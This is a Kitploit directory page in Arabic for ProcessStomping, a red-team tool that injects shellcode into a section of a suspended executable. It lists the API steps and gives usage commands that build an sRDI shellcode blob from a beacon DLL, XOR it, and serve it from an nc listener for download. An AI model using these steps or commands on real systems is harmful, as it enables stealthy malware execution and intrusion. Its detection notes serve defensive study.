Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
ProcessStomping — تنويع من ProcessOverwriting لتنفيذ شيلكود على قسم من ملف قابل للتنفيذ | Kitploit
أدوات/GitHubGitHub/naksyn/processstomping
شيل كودما بعد الاستغلالالتعلم والتعليمالفريق الأحمرتطوير الحمولاتاستغلال الملفات الثنائية
GitHubnaksyn/processstomping

ProcessStomping

تنويع من ProcessOverwriting لتنفيذ شيلكود على قسم من ملف قابل للتنفيذ

عرض المستودع
14727منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ProcessStomping

تنويع من ProcessOverwriting لتنفيذ شيلكود على قسم من ملف تنفيذي

Twitter

ما هو

للحصول على شرح أكثر تفصيلاً، يمكنك قراءة منشور مدونتي

Process Stomping هو تنويع من Process Overwriting لـ hasherezade ويتميز بكتابة حمولة شيلكود على قسم مستهدف بدلاً من كتابة حمولة PE كاملة على مساحة عنوان العملية المضيفة.

فيما يلي الخطوات الرئيسية لتقنية ProcessStomping:

  1. CreateProcess - ضبط علامة إنشاء العملية على CREATE_SUSPENDED (0x00000004) لتعليق الخيط الأساسي للعملية.
  2. WriteProcessMemory - تستخدم لكتابة كل شيلكود ضار إلى قسم العملية المستهدف.
  3. SetThreadContext - تستخدم لتوجيه نقطة الدخول إلى قسم كود جديد تم كتابته.
  4. ResumeThread - واضح بذاته.

كتطبيق مثال على هذه التقنية، يمكن استخدام الإثبات العملي (PoC) مع sRDI لتحميل مكتبة ارتباط ديناميكي (dll) لنظام beacon عبر قسم RWX لملف تنفيذي. تصف الصورة التالية الخطوات المتضمنة.

صورة

إخلاء مسؤولية

جميع المعلومات والمحتوى مقدمة لأغراض تعليمية فقط. اتبع التعليمات على مسؤوليتك الخاصة. لا يتحمل المؤلف ولا صاحب عمله أي مسؤولية عن أي ضرر مباشر أو تبعي أو خسارة ناتجة عن أي شخص أو منظمة.

الاعتمادات

أصبح هذا العمل ممكنًا بفضل المعرفة والأدوات التي شاركتها ألكسندرا دونيتس @hasherezade ونيك لاندرز.

الاستخدام

اختر العملية المستهدفة وقم بتعديل المتغيرات العامة وفقًا لذلك في ProcessStomping.cpp.

قم بتجميع مشروع sRDI مع التأكد من أن الإزاحة كافية لتجاوز كتلة شيلكود sRDI المولدة، ثم قم بتحديث أدوات sRDI:

cd \sRDI-master

python .\lib\Python\EncodeBlobs.py .\

قم بإنشاء حمولة dll بدون محمل انعكاسي (Reflective-Loaderless) من اختيارك، ثم قم بإنشاء كتلة شيلكود sRDI:

python .\lib\Python\ConvertToShellcode.py -b -f "changethedefault" .\noRLx86.dll

يمكن بعد ذلك إجراء XOR لكتلة الشيلكود مع كلمة مفتاحية وتنزيلها باستخدام مقبس بسيط

python xor.py noRLx86.bin noRLx86_enc.bin Bangarang

قم بتسليم الكتلة المشفرة بـ XOR عند الاتصال

nc -vv -l -k -p 8000 -w 30 < noRLx86_enc.bin

سيتم مسح كتلة sRDI بعد التنفيذ لإزالة القطع الأثرية غير الضرورية.

عرض توضيحي

https://github.com/naksyn/ProcessStomping/assets/59816245/8d9e1ac2-b47c-41d5-9f0e-1b3fee14ba50

تحذيرات

لتنفيذ هذه التقنية بنجاح، يجب عليك اختيار العملية المستهدفة الصحيحة واستخدام حمولة dll لا تأتي مع محمل انعكاسي مخصص من قبل المستخدم.

فرص الكشف

تتطلب تقنية Process Stomping بدء العملية المستهدفة في حالة معلقة، وتغيير نقطة دخول الخيط، ثم استئناف الخيط لتنفيذ الشيلكود المحقون. هذه عمليات قد تعتبر مشبوهة إذا تم تنفيذها بتتابع سريع وقد تؤدي إلى زيادة التدقيق من قبل بعض حلول الأمان.

تنزيل الأداة